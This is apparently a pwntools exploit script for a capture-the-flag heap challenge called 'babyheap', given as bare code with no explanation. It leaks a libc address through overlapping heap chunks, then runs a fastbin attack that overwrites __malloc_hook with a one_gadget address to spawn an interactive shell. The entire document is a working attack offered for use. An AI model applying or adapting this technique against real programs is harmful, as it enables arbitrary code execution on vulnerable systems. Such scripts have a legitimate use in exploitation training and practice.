1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72
| from pwn import * p = process('./babyheap') elf = ELF('./babyheap') libc = elf.libc
def Alloc(size, content): p.sendlineafter('choice: ','1') p.sendlineafter('please input chunk size: ',str(size)) p.sendlineafter('input chunk content: ',content)
def Show(index): p.sendlineafter('choice: ','2') p.sendlineafter('please input chunk index: ',str(index))
def Delete(index): p.sendlineafter('choice: ','3') p.sendlineafter('please input chunk index: ',str(index))
def leak_libc(): Alloc(0x90, 'unsorted bin') Alloc(0x18, 'fast bin') Alloc(0xf0, 'unsorted bin') Alloc(0x10,'aaaa')
Delete(1) Delete(0) Alloc(0x18, 'a'*0x10 + p64(0xc0)) Delete(2)
Alloc(0x90, 'a'*0x90) Show(0) p.recvuntil('content: ') leak_addr = u64(p.recvn(6).ljust(8, 'x00')) offset = 0x3c4b78 libc_address = leak_addr - offset return libc_address
def fastbin_attack(one_gadget): Delete(1) Alloc(0x100, 'a'*0x90+p64(0)+p64(0x71)) Delete(0) Delete(1)
fake_chunk = libc.address + 0x3c4af5 -0x8
Alloc(0x100, 'a'*0x90 +p64(0) + p64(0x71) + p64(fake_chunk)) Alloc(0x60,'aaaa') Alloc(0x60,'a'*0x13 + p64(one_gadget))
p.sendlineafter('choice: ','1') p.sendlineafter('please input chunk size: ','256')
if __name__ == '__main__': libc.address = leak_libc() log.success('libc address : ' + hex(libc.address)) log.success('malloc hook : ' + hex(libc.symbols['__malloc_hook'])) one_gadget = libc.address + 0x4526a fastbin_attack(one_gadget) p.interactive()
|